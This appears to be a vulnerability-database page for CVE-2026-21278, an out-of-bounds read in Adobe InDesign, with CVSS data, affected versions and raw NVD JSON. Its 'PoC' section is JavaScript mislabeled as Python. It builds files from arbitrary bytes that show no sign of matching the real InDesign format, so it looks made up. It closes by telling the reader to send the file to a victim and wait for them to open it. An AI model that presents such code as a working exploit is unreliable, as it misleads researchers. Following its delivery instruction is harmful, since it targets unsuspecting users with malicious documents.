Security Vulnerability Report
中文
CVE-2026-21278 CVSS 5.5 MEDIUM

CVE-2026-21278

Published: 2026-01-13 19:16:26
Last Modified: 2026-01-14 19:28:16
Source: [email protected]

Description

InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe InDesign Desktop <= 21.0
Adobe InDesign Desktop <= 19.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21278 PoC - Malicious InDesign Document Trigger // This PoC demonstrates the OOB read vulnerability in Adobe InDesign Desktop // DISCLAIMER: For educational and security research purposes only // Method 1: Generate malicious .indd file with crafted binary data const fs = require('fs'); function createMaliciousIndd() { // InDesign document header with malformed structure const header = Buffer.from([ 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06, 0x06 ]); // Crafted data that triggers OOB read in document parser const triggerData = Buffer.alloc(1024); triggerData.writeUInt32LE(0x41414141, 0); // Abnormal marker triggerData.writeUInt32LE(0xFFFFFFFF, 4); // Overflow value triggerData.writeUInt32LE(0x42424242, 8); // Padding trigger // Malformed object descriptor const objDesc = Buffer.from([ 0x00, 0x00, 0x00, 0x00, // Size field 0xFF, 0xFF, 0xFF, 0xFF, // Boundary bypass 0x00, 0x00, 0x00, 0x01 // Type indicator ]); const maliciousFile = Buffer.concat([header, triggerData, objDesc]); fs.writeFileSync('CVE-2026-21278_malicious.indd', maliciousFile); console.log('[+] Malicious InDesign file created: CVE-2026-21278_malicious.indd'); } // Method 2: Python script to create malformed IDML package function createMaliciousIdml() { const idmlContent = `<?xml version="1.0" encoding="UTF-8"?> <idPkg:Document xmlns:idPkg="http://ns.adobe.com/AdobeInDesign/idml/1.0/"> <Document> <Story> <ParagraphStyleRange> <CharacterStyleRange> <Content>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</Content> <Properties> <PointSize olyAttribute="malformed"/> </Properties> </CharacterStyleRange> </ParagraphStyleRange> </Story> </Document> </idPkg:Document>`; fs.writeFileSync('CVE-2026-21278_malicious.idml', idmlContent); console.log('[+] Malicious IDML file created: CVE-2026-21278_malicious.idml'); } createMaliciousIndd(); createMaliciousIdml(); console.log('[+] PoC files generated successfully'); console.log('[!] Usage: Send the malicious .indd file to victim and wait for them to open it');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21278", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:25.530", "lastModified": "2026-01-14T19:28:15.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to access sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones de InDesign Desktop 21.0, 19.5.5 y anteriores están afectadas por una vulnerabilidad de lectura fuera de límites que podría conducir a la exposición de memoria. Un atacante podría aprovechar esta vulnerabilidad para acceder a información sensible almacenada en la memoria. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.1", "matchCriteriaId": "7BFF153C-8825-407C-AF58-4AC567601D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.1", "matchCriteriaId": "7BF7435F-7314-440A-89A8-8C3D4CCCDD63"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/indesign/apsb26-02.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.